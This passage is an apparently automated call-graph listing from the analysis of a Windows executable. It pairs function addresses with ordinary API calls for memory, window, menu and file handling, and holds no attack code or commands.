50766->50767 50771 4014e4 50766->50771 50780 4013e0 LocalAlloc 50766->50780 50781 4015c0 VirtualFree 50767->50781 50768 4017be 50768->50764 50770->50754 50772 4014f3 VirtualAlloc 50771->50772 50774 401520 50772->50774 50775 401543 50772->50775 50782 401398 50774->50782 50775->50766 50778 401530 VirtualFree 50778->50775 50779->50768 50780->50766 50781->50764 50785 401340 50782->50785 50786 40134c LocalAlloc 50785->50786 50787 40135e 50785->50787 50786->50787 50787->50775 50787->50778 50789 401d2e 50788->50789 50790 401d51 50789->50790 50791 401d63 50789->50791 50801 401940 50790->50801 50793 401940 3 API calls 50791->50793 50794 401d61 50793->50794 50800 401d79 50794->50800 50811 401bf8 9 API calls 50794->50811 50796 401d88 50797 401da2 50796->50797 50812 401c4c 9 API calls 50796->50812 50813 401454 LocalAlloc 50797->50813 50800->50758 50802 4019bf 50801->50802 50803 401966 50801->50803 50802->50794 50814 40170c 50803->50814 50807 401983 50808 40199a 50807->50808 50819 4015c0 VirtualFree 50807->50819 50808->50802 50820 401454 LocalAlloc 50808->50820 50811->50796 50812->50797 50813->50800 50817 401743 50814->50817 50815 401783 50818 4013e0 LocalAlloc 50815->50818 50816 40175d VirtualFree 50816->50817 50817->50815 50817->50816 50818->50807 50819->50808 50820->50802 50821 416644 50822 416651 50821->50822 50823 4166ab 50821->50823 50828 416550 CreateWindowExA 50822->50828 50824 416658 SetPropA SetPropA 50824->50823 50825 41668b 50824->50825 50826 41669e SetWindowPos 50825->50826 50826->50823 50828->50824 56430 4222e4 56431 4222f3 56430->56431 56436 421274 56431->56436 56434 422313 56437 4212e3 56436->56437 56450 421283 56436->56450 56440 4212f4 56437->56440 56461 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 56437->56461 56439 421322 56443 421395 56439->56443 56448 42133d 56439->56448 56440->56439 56442 4213ba 56440->56442 56441 421393 56444 4213e6 56441->56444 56463 421e2c 11 API calls 56441->56463 56442->56441 56445 4213ce SetMenu 56442->56445 56443->56441 56451 4213a9 56443->56451 56464 4211bc 10 API calls 56444->56464 56445->56441 56448->56441 56454 421360 GetMenu 56448->56454 56449 4213ed 56449->56434 56459 4221e8 10 API calls 56449->56459 56450->56437 56460 408d2c 19 API calls 56450->56460 56453 4213b2 SetMenu 56451->56453 56453->56441 56455 421383 56454->56455 56456 42136a 56454->56456 56462 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 56455->56462 56458 42137d SetMenu 56456->56458 56458->56455 56459->56434 56460->56450 56461->56440 56462->56441 56463->56444 56464->56449 56465 44b4a8 56466 44b4b6 56465->56466 56468 44b4d5 56465->56468 56467 44b38c 11 API calls 56466->56467 56466->56468 56467->56468 56469 448728 56470 44875d 56469->56470 56477 448756 56469->56477 56473 44852c 7 API calls 56470->56473 56474 448771 56470->56474 56471 403494 4 API calls 56475 44878a 56471->56475 56472 403400 4 API calls 56476 448907 56472->56476 56473->56474 56474->56471 56474->56477 56478 4037b8 4 API calls 56475->56478 56477->56472 56479 4487a6 56478->56479 56480 4037b8 4 API calls 56479->56480 56481 4487c2 56480->56481 56481->56477 56482 4487d6 56481->56482 56483 4037b8 4 API calls 56482->56483 56484 4487f0 56483->56484 56485 431bd0 4 API calls 56484->56485 56486 448812 56485->56486 56487 431ca0 4 API calls 56486->56487 56493 448832 56486->56493 56487->56486 56488 448888 56501 442334 56488->56501 56491 448870 56491->56488 56513 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56491->56513 56492 4488bc GetLastError 56514 4484c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56492->56514 56493->56491 56512 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56493->56512 56496 4488cb 56515 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56496->56515 56498 4488e0 56516 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56498->56516 56500 4488e8 56502 443312 56501->56502 56503 44236d 56501->56503 56505 403400 4 API calls 56502->56505 56504 403400 4 API calls 56503->56504 56506 442375 56504->56506 56507 443327 56505->56507 56508 431bd0 4 API calls 56506->56508 56507->56492 56509 442381 56508->56509 56510 443302 56509->56510 56517 441a0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56509->56517 56510->56492 56512->56493 56513->56488 56514->56496 56515->56498 56516->56500 56517->56509 56518 4165ec DestroyWindow 56519 42e3ef SetErrorMode 50829 441394 50830 44139d 50829->50830 50831 4413ab WriteFile 50829->50831 50830->50831 50832 4413b6 50831->50832 56520 491bf8 56521 491c32 56520->56521 56522 491c3e 56521->56522 56523 491c34 56521->56523 56525 491c4d 56522->56525 56526 491c76 56522->56526 56716 409098 MessageBeep 56523->56716 56528 446ff8 18 API calls 56525->56528 56532 491cae 56526->56532 56533 491c85 56526->56533 56527 403420 4 API calls 56530 49228a 56527->56530 56529 491c5a 56528->56529 56717 406bb0 56529->56717 56534 403400 4 API calls 56530->56534 56540 491cbd 56532->56540 56541 491ce6 56532->56541 56537 446ff8 18 API calls 56533->56537 56535 492292 56534->56535 56539 491c92 56537->56539 56725 406c00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56539->56725 56543 446ff8 18 API calls 56540->56543 56548 491d0e 56541->56548 56549 491cf5 56541->56549 56545 491cca 56543->56545 56544 491c9d 56726 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56544->56726 56727 406c34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56545->56727 56554 491d1d 56548->56554 56555 491d42 56548->56555 56729 407280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 56549->56729 56550 491cd5 56728 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56550->56728 56553 491cfd 56730 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56553->56730 56557 446ff8 18 API calls 56554->56557 56560 491d7a 56555->56560 56561 491d51 56555->56561 56558 491d2a 56557->56558 56559 4072a8 SetCurrentDirectoryA 56558->56559 56562 491d32 56559->56562 56567 491d89 56560->56567 56568 491db2 56560->56568 56563 446ff8 18 API calls 56561->56563 56731 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56562->56731 56564 491d5e 56563->56564 56566 42c804 5 API calls 56564->56566 56569 491d69 56566->56569 56570 446ff8 18 API calls 56567->56570 56573 491dfe 56568->56573 56574 491dc1 56568->56574 56732 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56569->56732 56572 491d96 56570->56572 56733 4071f8 8 API calls 56572->56733 56581 491e0d 56573->56581 56582 491e36 56573->56582 56576 446ff8 18 API calls 56574->56576 56578 491dd0 56576->56578 56577 491da1 56734 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56577->56734 56580 446ff8 18 API calls 56578->56580 56583 491de1 56580->56583 56584 446ff8 18 API calls 56581->56584 56589 491e6e 56582->56589 56590 491e45 56582->56590 56735 4918fc 8 API calls 56583->56735 56585 491e1a 56584->56585 56587 42c8a4 5 API calls 56585->56587 56591 491e25 56587->56591 56588 491ded 56736 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56588->56736 56596 491e7d 56589->56596 56597 491ea6 56589->56597 56593 446ff8 18 API calls 56590->56593 56737 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56591->56737 56595 491e52 56593->56595 56598 42c8cc 5 API calls 56595->56598 56599 446ff8 18 API calls 56596->56599 56604 491ede 56597->56604 56605 491eb5 56597->56605 56600 491e5d 56598->56600 56601 491e8a 56599->56601 56738 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56600->56738 56739 42c8fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56601->56739 56610 491eed 56604->56610 56611 491f16 56604->56611 56607 446ff8 18 API calls 56605->56607 56606 491e95 56740 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56606->56740 56609 491ec2 56607->56609 56612 42c92c 5 API calls 56609->56612 56614 446ff8 18 API calls 56610->56614 56617 491f62 56611->56617 56618 491f25 56611->56618 56613 491ecd 56612->56613 56741 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56613->56741 56616 491efa 56614->56616 56619 42c954 5 API calls 56616->56619 56625 491f71 56617->56625 56626 491fb4 56617->56626 56620 446ff8 18 API calls 56618->56620 56621 491f05 56619->56621 56622 491f34 56620->56622 56742 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56621->56742 56624 446ff8 18 API calls 56622->56624 56627 491f45 56624->56627 56628 446ff8 18 API calls 56625->56628 56632 491fc3 56626->56632 56633 492027 56626->56633 56743 42c4f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56627->56743 56630 491f84 56628->56630 56634 446ff8 18 API calls 56630->56634 56631 491f51 56744 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56631->56744 56637 446ff8 18 API calls 56632->56637 56641 492066 56633->56641 56642 492036 56633->56642 56635 491f95 56634->56635 56745 491af4 12 API calls 56635->56745 56639 491fd0 56637->56639 56708 42c608 7 API calls 56639->56708 56640 491fa3 56746 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56640->56746 56650 4920a5 56641->56650 56651 492075 56641->56651 56645 446ff8 18 API calls 56642->56645 56647 492043 56645->56647 56646 491fde 56648 491fe2 56646->56648 56649 492017 56646->56649 56749 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56647->56749 56654 446ff8 18 API calls 56648->56654 56748 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56649->56748 56665 4920e4 56650->56665 56666 4920b4 56650->56666 56655 446ff8 18 API calls 56651->56655 56658 491ff1 56654->56658 56660 492082 56655->56660 56656 491c39 56656->56527 56657 492050 56750 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56657->56750 56709 452c80 56658->56709 56664 452770 5 API calls 56660->56664 56662 492061 56662->56656 56663 492001 56747 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56663->56747 56668 49208f 56664->56668 56673 49212c 56665->56673 56674 4920f3 56665->56674 56669 446ff8 18 API calls 56666->56669 56751 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56668->56751 56670 4920c1 56669->56670 56752 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56670->56752 56679 49213b 56673->56679 56680 492174 56673->56680 56676 446ff8 18 API calls 56674->56676 56675 4920ce 56753 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56675->56753 56678 492102 56676->56678 56681 446ff8 18 API calls 56678->56681 56682 446ff8 18 API calls 56679->56682 56685 492187 56680->56685 56692 49223d 56680->56692 56683 492113 56681->56683 56684 49214a 56682->56684 56689 447278 5 API calls 56683->56689 56686 446ff8 18 API calls 56684->56686 56687 446ff8 18 API calls 56685->56687 56688 49215b 56686->56688 56690 4921b4 56687->56690 56695 447278 5 API calls 56688->56695 56689->56656 56691 446ff8 18 API calls 56690->56691 56693 4921cb 56691->56693 56692->56656 56757 446f9c 18 API calls 56692->56757 56754 407ddc 7 API calls 56693->56754 56695->56656 56696 492256 56697 42e8c8 5 API calls 56696->56697 56698 49225e 56697->56698 56758 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56698->56758 56701 4921ed 56702 446ff8 18 API calls 56701->56702 56703 492201 56702->56703 56755 408508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56703->56755 56705 49220c 56756 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56705->56756 56707 492218 56708->56646 56710 452724 2 API calls 56709->56710 56712 452c99 56710->56712 56711 452c9d 56711->56663 56712->56711 56713 452cc1 MoveFileA GetLastError 56712->56713 56714 452760 Wow64RevertWow64FsRedirection 56713->56714 56715 452ce7 56714->56715 56715->56663 56716->56656 56718 406bbf 56717->56718 56719 406be1 56718->56719 56720 406bd8 56718->56720 56723 403778 4 API calls 56719->56723 56721 403400 4 API calls 56720->56721 56722 406bdf 56721->56722 56724 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56722->56724 56723->56722 56724->56656 56725->56544 56726->56656 56727->56550 56728->56656 56729->56553 56730->56656 56731->56656 56732->56656 56733->56577 56734->56656 56735->56588 56736->56656 56737->56656 56738->56656 56739->56606 56740->56656 56741->56656 56742->56656 56743->56631 56744->56656 56745->56640 56746->56656 56747->56656 56748->56656 56749->56657 56750->56662 56751->56656 56752->56675 56753->56656 56754->56701 56755->56705 56756->56707 56757->56696 56758->56656 56759 40cc34 56762 406f10 WriteFile 56759->56762 56763 406f2d 56762->56763 50833 48095d 50838 451004 50833->50838 50835 480971 50848 47fa0c 50835->50848 50837 480995 50839 451011 50838->50839 50841 451065 50839->50841 50857 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50839->50857 50854 450e88 50841->50854 50845 45108d 50846 4510d0 50845->50846 50859 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50845->50859 50846->50835 50864 40b3c8 50848->50864 50850 47fa79 50850->50837 50853 47fa2e 50853->50850 50868 4069dc 50853->50868 50871 476994 50853->50871 50860 450e34 50854->50860 50857->50841 50858 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50858->50845 50859->50846 50861 450e57 50860->50861 50862 450e46 50860->50862 50861->50845 50861->50858 50863 450e4b InterlockedExchange 50862->50863 50863->50861 50865 40b3d3 50864->50865 50866 40b3f3 50865->50866 50887 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50865->50887 50866->50853 50869 402648 4 API calls 50868->50869 50870 4069e7 50869->50870 50870->50853 50880 4769c5 50871->50880 50884 476a0e 50871->50884 50872 476a59 50888 451294 50872->50888 50873 451294 21 API calls 50873->50880 50875 451294 21 API calls 50875->50884 50876 476a70 50878 403420 4 API calls 50876->50878 50881 476a8a 50878->50881 50879 4038a4 4 API calls 50879->50884 50880->50873 50880->50884 50894 4038a4 50880->50894 50903 403744 50880->50903 50907 403450 50880->50907 50881->50853 50884->50872 50884->50875 50884->50879 50885 403450 4 API calls 50884->50885 50886 403744 4 API calls 50884->50886 50885->50884 50886->50884 50887->50866 50889 4512af 50888->50889 50893 4512a4 50888->50893 50913 451238 21 API calls 50889->50913 50891 4512ba 50891->50893 50914 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50891->50914 50893->50876 50895 4038b1 50894->50895 50902 4038e1 50894->50902 50897 4038da 50895->50897 50899 4038bd 50895->50899 50896 403400 4 API calls 50898 4038cb 50896->50898 50900 4034bc 4 API calls 50897->50900 50898->50880 50915 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50899->50915 50900->50902 50902->50896 50904 40374a 50903->50904 50906 40375b 50903->50906 50905 4034bc 4 API calls 50904->50905 50904->50906 50905->50906 50906->50880 50908 403454 50907->50908 50911 403464 50907->50911 50910 4034bc 4 API calls 50908->50910 50908->50911 50909 403490 50909->50880 50910->50911 50911->50909 50912 402660 4 API calls 50911->50912 50912->50909 50913->50891 50914->50893 50915->50898 50916 41ee54 50917 41ee63 IsWindowVisible 50916->50917 50918 41ee99 50916->50918 50917->50918 50919 41ee6d IsWindowEnabled 50917->50919 50919->50918 50920 41ee77 50919->50920 50921 402648 4 API calls 50920->50921 50922 41ee81 EnableWindow 50921->50922 50922->50918 50923 46bb10 50924 46bfad 50923->50924 50925 46bb44 50923->50925 50926 403400 4 API calls 50924->50926 50927 46bb80 50925->50927 50930 46bbdc 50925->50930 50931 46bbba 50925->50931 50932 46bbcb 50925->50932 50933 46bb98 50925->50933 50934 46bba9 50925->50934 50929 46bfec 50926->50929 50927->50924 51014 468c74 50927->51014 50936 403400 4 API calls 50929->50936 51246 46baa0 45 API calls 50930->51246 50979 46b6d0 50931->50979 51245 46b890 67 API calls 50932->51245 51243 46b420 47 API calls 50933->51243 51244 46b588 42 API calls 50934->51244 50942 46bff4 50936->50942 50941 46bb9e 50941->50924 50941->50927 50943 46bc18 50943->50924 50957 46bc5b 50943->50957 51247 494da0 50943->51247 50946 46bd7e 51266 48358c 123 API calls 50946->51266 50949 46bd99 50949->50924 50950 42cbc0 6 API calls 50950->50957 50951 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50951->50957 50952 46af68 23 API calls 50952->50957 50955 414ae8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50955->50957 50956 46af68 23 API calls 50956->50924 50957->50924 50957->50946 50957->50950 50957->50951 50957->50952 50957->50955 50958 46bdd7 50957->50958 50975 46be9f 50957->50975 51017 468bb0 50957->51017 51025 46acd4 50957->51025 51170 483084 50957->51170 51283 46b1dc 19 API calls 50957->51283 51032 469f1c 50958->51032 50960 46be3d 50961 403450 4 API calls 50960->50961 50962 46be4d 50961->50962 50963 46bea9 50962->50963 50964 46be59 50962->50964 50969 46bf6b 50963->50969 51093 46af68 50963->51093 51267 457f1c 50964->51267 50968 457f1c 24 API calls 50968->50975 50975->50956 51284 46c424 50979->51284 50982 46b852 50983 403420 4 API calls 50982->50983 50985 46b86c 50983->50985 50987 403400 4 API calls 50985->50987 50986 46b71e 50988 46b83e 50986->50988 51291 455f84 13 API calls 50986->51291 50990 46b874 50987->50990 50988->50982 50989 403450 4 API calls 50988->50989 50989->50982 50992 403400 4 API calls 50990->50992 50993 46b87c 50992->50993 50993->50927 50995 46b801 50995->50982 50995->50988 51000 42cd48 7 API calls 50995->51000 50996 46b73c 50998 46b7a1 50996->50998 51292 466600 50996->51292 50998->50982 50998->50995 51301 42cd48 50998->51301 51003 46b817 51000->51003 51003->50988 51008 451458 4 API calls 51003->51008 51004 466600 19 API calls 51010 46b82e 51008->51010 51308 47efd0 42 API calls 51010->51308 51015 468bb0 19 API calls 51014->51015 51016 468c83 51015->51016 51016->50943 51020 468bdf 51017->51020 51018 4078f4 19 API calls 51019 468c18 51018->51019 51562 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51019->51562 51020->51018 51022 468c20 51020->51022 51023 403400 4 API calls 51022->51023 51024 468c38 51023->51024 51024->50957 51026 46ace5 51025->51026 51027 46ace0 51025->51027 51648 469a80 46 API calls 51026->51648 51028 46ace3 51027->51028 51563 46a740 51027->51563 51028->50957 51030 46aced 51030->50957 51033 403400 4 API calls 51032->51033 51034 469f4a 51033->51034 52025 47dd00 51034->52025 51036 469fad 51037 469fb1 51036->51037 51038 469fca 51036->51038 52032 466800 51037->52032 51041 469fbb 51038->51041 52035 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51038->52035 51040 46a25e 51045 403420 4 API calls 51040->51045 51041->51040 51043 46a154 51041->51043 51044 46a0e9 51041->51044 51048 403494 4 API calls 51043->51048 51047 403494 4 API calls 51044->51047 51049 46a288 51045->51049 51046 469fe6 51046->51041 51050 469fee 51046->51050 51051 46a0f6 51047->51051 51052 46a161 51048->51052 51049->50960 51053 46af68 23 API calls 51050->51053 51054 40357c 4 API calls 51051->51054 51055 40357c 4 API calls 51052->51055 51060 469ffb 51053->51060 51056 46a103 51054->51056 51057 46a16e 51055->51057 51058 40357c 4 API calls 51056->51058 51059 40357c 4 API calls 51057->51059 51061 46a110 51058->51061 51062 46a17b 51059->51062 51065 46a024 SetActiveWindow 51060->51065 51066 46a03c 51060->51066 51063 40357c 4 API calls 51061->51063 51064 40357c 4 API calls 51062->51064 51067 46a11d 51063->51067 51068 46a188 51064->51068 51065->51066 52036 42f560 51066->52036 51069 466800 20 API calls 51067->51069 51070 40357c 4 API calls 51068->51070 51071 46a12b 51069->51071 51072 46a196 51070->51072 51074 40357c 4 API calls 51071->51074 51075 414b18 4 API calls 51072->51075 51077 46a134 51074->51077 51078 46a152 51075->51078 51081 40357c 4 API calls 51077->51081 52053 466b38 51078->52053 51082 46a141 51081->51082 51084 414b18 4 API calls 51082->51084 51083 46a08d 51085 46ade4 21 API calls 51083->51085 51084->51078 51086 46a0bf 51085->51086 51086->50960 51094 468c74 19 API calls 51093->51094 51095 46af80 51094->51095 51096 46afa2 51095->51096 51097 4652cc 7 API calls 51095->51097 52249 4652cc 51096->52249 51097->51096 51101 46afba 51102 46ade4 21 API calls 51101->51102 51103 46aff2 51102->51103 51104 414b18 4 API calls 51103->51104 51105 46b006 51104->51105 51106 46b012 51105->51106 51107 46b03c 51105->51107 51108 414b18 4 API calls 51106->51108 51110 46b05b 51107->51110 51111 46b085 51107->51111 51109 46b026 51108->51109 51113 414b18 4 API calls 51109->51113 51114 414b18 4 API calls 51110->51114 51112 414b18 4 API calls 51111->51112 51116 46b099 51112->51116 51115 46b06f 51114->51115 51171 46c424 48 API calls 51170->51171 51172 4830c7 51171->51172 51173 4830d0 51172->51173 52536 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51172->52536 51175 414ae8 4 API calls 51173->51175 51176 4830e0 51175->51176 51177 403450 4 API calls 51176->51177 51178 4830ed 51177->51178 52338 46c77c 51178->52338 51181 4830fd 51182 414ae8 4 API calls 51181->51182 51184 48310d 51182->51184 51185 403450 4 API calls 51184->51185 51186 48311a 51185->51186 51187 469868 SendMessageA 51186->51187 51188 483133 51187->51188 51189 483184 51188->51189 52538 479e18 23 API calls 51188->52538 52367 4241dc IsIconic 51189->52367 51193 48319f SetActiveWindow 51194 4831b4 51193->51194 52375 4824b4 51194->52375 51243->50941 51244->50927 51245->50927 51246->50927 54199 43d9c8 51247->54199 51250 494dcc 54204 431bd0 51250->54204 51251 494e52 51252 494e61 51251->51252 54237 4945c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51251->54237 51252->50957 51261 494e16 54235 49465c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51261->54235 51263 494e2a 54236 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51263->54236 51265 494e4a 51265->50957 51266->50949 51268 457f41 51267->51268 51269 4078f4 19 API calls 51268->51269 51270 457f61 51268->51270 51271 457f59 51269->51271 51272 403400 4 API calls 51270->51272 51273 457d10 24 API calls 51271->51273 51274 457f76 51272->51274 51273->51270 51274->50968 51283->50957 51309 46c4bc 51284->51309 51287 414ae8 51288 414af6 51287->51288 51289 4034e0 4 API calls 51288->51289 51290 414b03 51289->51290 51290->50986 51291->50996 51294 46661a 51292->51294 51513 4078f4 51294->51513 51556 42cccc 51301->51556 51304 451458 51305 451428 4 API calls 51304->51305 51306 451474 51305->51306 51308->50988 51310 414ae8 4 API calls 51309->51310 51311 46c4f0 51310->51311 51370 466898 51311->51370 51315 46c502 51316 46c511 51315->51316 51317 46c52a 51315->51317 51440 47efd0 42 API calls 51316->51440 51320 46c571 51317->51320 51322 46c558 51317->51322 51319 403420 4 API calls 51321 46b702 51319->51321 51323 46c5d6 51320->51323 51337 46c575 51320->51337 51321->50982 51321->51287 51441 47efd0 42 API calls 51322->51441 51443 42cb4c CharNextA 51323->51443 51326 46c525 51326->51319 51327 46c5e5 51328 46c5e9 51327->51328 51333 46c602 51327->51333 51444 47efd0 42 API calls 51328->51444 51330 46c5bd 51442 47efd0 42 API calls 51330->51442 51332 46c626 51445 47efd0 42 API calls 51332->51445 51333->51332 51384 466a08 51333->51384 51336 46c616 51336->51332 51389 466a38 51336->51389 51337->51330 51337->51333 51340 46c63f 51393 403778 51340->51393 51345 46c666 51446 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51345->51446 51346 46c697 51404 42c8cc 51346->51404 51350 46c679 51351 451458 4 API calls 51350->51351 51353 46c686 51351->51353 51447 47efd0 42 API calls 51353->51447 51375 4668b2 51370->51375 51372 42cbc0 6 API calls 51372->51375 51373 403450 4 API calls 51373->51375 51374 406bb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51374->51375 51375->51372 51375->51373 51375->51374 51376 4668fb 51375->51376 51450 42caac 51375->51450 51377 403420 4 API calls 51376->51377 51378 466915 51377->51378 51379 414b18 51378->51379 51380 414ae8 4 API calls 51379->51380 51381 414b3c 51380->51381 51382 403400 4 API calls 51381->51382 51383 414b6d 51382->51383 51383->51315 51387 466a12 51384->51387 51385 466a33 51385->51336 51386 466a25 51386->51336 51387->51385 51387->51386 51466 42cb3c CharNextA 51387->51466 51391 466a42 51389->51391 51390 466a6f 51390->51332 51390->51340 51391->51390 51467 42cb3c CharNextA 51391->51467 51394 4037aa 51393->51394 51395 40377d 51393->51395 51396 403400 4 API calls 51394->51396 51395->51394 51398 403791 51395->51398 51397 4037a0 51396->51397 51400 42c99c 51397->51400 51399 4034e0 4 API calls 51398->51399 51399->51397 51401 42c9f5 51400->51401 51402 42c9b2 51400->51402 51401->51345 51401->51346 51402->51401 51468 42cb3c CharNextA 51402->51468 51469 42c674 51404->51469 51440->51326 51441->51326 51442->51326 51443->51327 51444->51326 51445->51326 51446->51350 51447->51326 51451 403494 4 API calls 51450->51451 51454 42cabc 51451->51454 51452 403744 4 API calls 51452->51454 51454->51452 51457 42caf2 51454->51457 51459 42c444 IsDBCSLeadByte 51454->51459 51455 42cb36 51455->51375 51457->51455 51460 4037b8 51457->51460 51465 42c444 IsDBCSLeadByte 51457->51465 51459->51454 51461 403744 4 API calls 51460->51461 51463 4037c6 51461->51463 51462 4037fc 51462->51457 51463->51462 51464 4038a4 4 API calls 51463->51464 51464->51462 51465->51457 51466->51387 51467->51391 51468->51402 51472 42c67c 51469->51472 51475 42c68d 51472->51475 51473 42c6f1 51475->51473 51478 42c6ab 51475->51478 51516 407908 51513->51516 51517 407925 51516->51517 51524 4075b8 51517->51524 51520 407951 51522 4034e0 4 API calls 51520->51522 51523 407903 51522->51523 51523->51004 51527 4075d3 51524->51527 51525 4075e5 51525->51520 51529 4069a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51525->51529 51527->51525 51530 4076da 19 API calls 51527->51530 51531 4075ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51527->51531 51529->51520 51530->51527 51531->51527 51557 42cbc0 6 API calls 51556->51557 51558 42ccee 51557->51558 51559 42ccf6 GetFileAttributesA 51558->51559 51560 403400 4 API calls 51559->51560 51561 42cd13 51560->51561 51561->50995 51561->51304 51562->51022 51565 46a787 51563->51565 51564 46abff 51567 46ac1a 51564->51567 51568 46ac4b 51564->51568 51565->51564 51566 46a842 51565->51566 51570 403494 4 API calls 51565->51570 51569 46a863 51566->51569 51573 46a8a4 51566->51573 51571 403494 4 API calls 51567->51571 51572 403494 4 API calls 51568->51572 51574 403494 4 API calls 51569->51574 51575 46a7c6 51570->51575 51576 46ac28 51571->51576 51577 46ac59 51572->51577 51581 403400 4 API calls 51573->51581 51578 46a871 51574->51578 51579 414ae8 4 API calls 51575->51579 51675 46915c 12 API calls 51576->51675 51676 46915c 12 API calls 51577->51676 51583 414ae8 4 API calls 51578->51583 51584 46a7e7 51579->51584 51585 46a8a2 51581->51585 51587 46a892 51583->51587 51649 403634 51584->51649 51634 46a988 51585->51634 51655 469868 51585->51655 51586 46ac36 51589 403400 4 API calls 51586->51589 51592 403634 4 API calls 51587->51592 51590 46ac7c 51589->51590 51595 403400 4 API calls 51590->51595 51591 46aa10 51597 403400 4 API calls 51591->51597 51592->51585 51601 46ac84 51595->51601 51603 46aa0e 51597->51603 51598 46a8c4 51599 46a902 51598->51599 51600 46a8ca 51598->51600 51606 403400 4 API calls 51599->51606 51604 403494 4 API calls 51600->51604 51605 403420 4 API calls 51601->51605 51670 469ca4 43 API calls 51603->51670 51607 46a8d8 51604->51607 51608 46ac91 51605->51608 51610 46a900 51606->51610 51661 47c26c 51607->51661 51608->51028 51609 46a9cf 51614 403494 4 API calls 51609->51614 51664 469b5c 51610->51664 51618 46a9dd 51614->51618 51616 46aa39 51625 46aa44 51616->51625 51626 46aa9a 51616->51626 51617 46a8f0 51620 403634 4 API calls 51617->51620 51621 414ae8 4 API calls 51618->51621 51620->51610 51623 46a9fe 51621->51623 51627 403634 4 API calls 51623->51627 51624 46a929 51630 46a934 51624->51630 51631 46a98a 51624->51631 51629 403494 4 API calls 51625->51629 51628 403400 4 API calls 51626->51628 51627->51603 51635 46aaa2 51628->51635 51637 46aa52 51629->51637 51632 403494 4 API calls 51630->51632 51633 403400 4 API calls 51631->51633 51639 46a942 51632->51639 51633->51634 51634->51591 51634->51609 51647 46ab4b 51635->51647 51671 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51635->51671 51637->51635 51641 403634 4 API calls 51637->51641 51642 46aa98 51637->51642 51638 46aac5 51638->51647 51672 494f3c 18 API calls 51638->51672 51639->51634 51643 403634 4 API calls 51639->51643 51641->51637 51642->51635 51643->51639 51645 46abec 51674 429144 SendMessageA SendMessageA 51645->51674 51673 4290f4 SendMessageA 51647->51673 51648->51030 51650 40363c 51649->51650 51651 4034bc 4 API calls 51650->51651 51652 40364f 51651->51652 51653 403450 4 API calls 51652->51653 51654 403677 51653->51654 51677 42a040 SendMessageA 51655->51677 51657 469877 51658 469897 51657->51658 51678 42a040 SendMessageA 51657->51678 51658->51598 51660 469887 51660->51598 51679 47c2b4 51661->51679 51668 469b89 51664->51668 51665 469beb 51666 403400 4 API calls 51665->51666 51667 469c00 51666->51667 51667->51624 51668->51665 52024 469ae0 43 API calls 51668->52024 51670->51616 51671->51638 51672->51647 51673->51645 51674->51564 51675->51586 51676->51586 51677->51657 51678->51660 51680 403494 4 API calls 51679->51680 51687 47c2e7 51680->51687 51681 47c3f9 51682 403420 4 API calls 51681->51682 51683 47c289 51682->51683 51683->51617 51685 403778 4 API calls 51685->51687 51687->51681 